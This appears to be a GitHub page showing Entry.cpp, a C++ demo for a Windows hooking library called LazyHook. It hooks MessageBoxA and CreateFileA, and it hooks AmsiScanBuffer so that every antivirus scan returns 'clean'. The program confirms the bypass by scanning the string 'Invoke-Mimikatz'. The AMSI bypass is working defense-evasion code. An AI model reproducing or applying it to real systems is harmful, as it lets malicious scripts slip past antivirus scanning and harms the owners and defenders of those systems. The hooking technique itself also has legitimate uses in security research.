-
Notifications
You must be signed in to change notification settings - Fork 26
Expand file tree
/
Copy pathEntry.cpp
More file actions
76 lines (59 loc) · 2.91 KB
/
Entry.cpp
File metadata and controls
76 lines (59 loc) · 2.91 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#include <Windows.h>
#include <cstdio>
#include <iostream>
#include <amsi.h>
#include "Internal/LazyHook/LazyHook.hpp"
#pragma comment(lib, "amsi.lib")
typedef int (WINAPI* TypeMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);
typedef HANDLE(WINAPI* TypeCreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef HRESULT(WINAPI* TypeAmsiScanBuffer)(HAMSICONTEXT, PVOID, ULONG, LPCWSTR, HAMSISESSION, AMSI_RESULT*);
TypeMessageBoxA OriginalMessageBoxA = nullptr;
TypeCreateFileA OriginalCreateFileA = nullptr;
TypeAmsiScanBuffer OriginalAmsiScanBuffer = nullptr;
int WINAPI HookMessageBoxA(HWND H, LPCSTR T, LPCSTR C, UINT U)
{
printf("[*] MessageBoxA hooked!\n");
return LazyHook::CallOriginal<int>(LazyHook::GetIatState(), H, "Hooked!", ">:)", U);
}
HANDLE WINAPI HookCreateFileA(LPCSTR Filename, DWORD Access, DWORD Share, LPSECURITY_ATTRIBUTES Sec, DWORD Creation, DWORD Flags, HANDLE Template)
{
printf("[*] CreateFileA hooked: %s\n", Filename);
return LazyHook::CallOriginal<HANDLE>(LazyHook::GetEatState(), Filename, Access, Share, Sec, Creation, Flags, Template);
}
HRESULT WINAPI HookAmsiScanBuffer(HAMSICONTEXT AmsiContext, PVOID Buffer, ULONG Length, LPCWSTR ContentName, HAMSISESSION AmsiSession, AMSI_RESULT* Result)
{
printf("[*] AmsiScanBuffer hooked! Bypassing...\n");
HRESULT OrgResult = LazyHook::CallOriginal<HRESULT>(LazyHook::GetEatState(), AmsiContext, Buffer, Length, ContentName, AmsiSession, Result);
(*Result) = AMSI_RESULT_CLEAN;
return OrgResult;
}
int main()
{
printf("[*] Installing MessageBoxA IAT hook...\n");
if (LazyHook::HookIAT("user32.dll", "MessageBoxA", HookMessageBoxA, (PVOID*)&OriginalMessageBoxA))
printf("[+] MessageBoxA hooked!\n");
printf("\n[*] Testing MessageBoxA...\n");
MessageBoxA(NULL, "Test", "Test", 0);
printf("\n[*] Loading amsi.dll...\n");
LoadLibraryA("amsi.dll");
printf("[*] Installing AmsiScanBuffer EAT hook...\n");
if (LazyHook::HookEAT("amsi.dll", "AmsiScanBuffer", HookAmsiScanBuffer, (PVOID*)&OriginalAmsiScanBuffer))
printf("[+] AmsiScanBuffer hooked!\n");
else
printf("[-] AmsiScanBuffer hook failed!\n");
printf("\n[*] Testing AMSI bypass...\n");
HAMSICONTEXT AmsiContext = nullptr;
AmsiInitialize(L"TestApp", &AmsiContext);
const char* MaliciousString = "Invoke-Mimikatz";
AMSI_RESULT ScanResult = AMSI_RESULT_CLEAN;
AmsiScanBuffer(AmsiContext, (PVOID)MaliciousString, (ULONG)strlen(MaliciousString), L"Test", NULL, &ScanResult);
printf("[*] AMSI Result: %d (0=Clean, should be clean if bypass works)\n", ScanResult);
AmsiUninitialize(AmsiContext);
printf("\n[*] Press any key to unhook...\n");
getchar();
if (LazyHook::UnhookIAT())
printf("[+] IAT hook removed!\n");
if (LazyHook::UnhookEAT())
printf("[+] EAT hook removed!\n");
return 0;
}